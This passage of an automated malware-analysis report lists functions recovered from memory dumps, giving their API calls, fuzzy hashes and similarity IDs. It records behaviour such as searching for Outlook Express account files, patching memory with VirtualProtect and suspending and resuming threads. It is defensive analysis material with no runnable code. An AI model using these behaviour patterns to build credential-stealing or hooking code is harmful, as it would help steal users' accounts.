  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3464F, Relevance: 6.0, APIs: 4, Instructions: 32 Total matches: 128memorystring
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
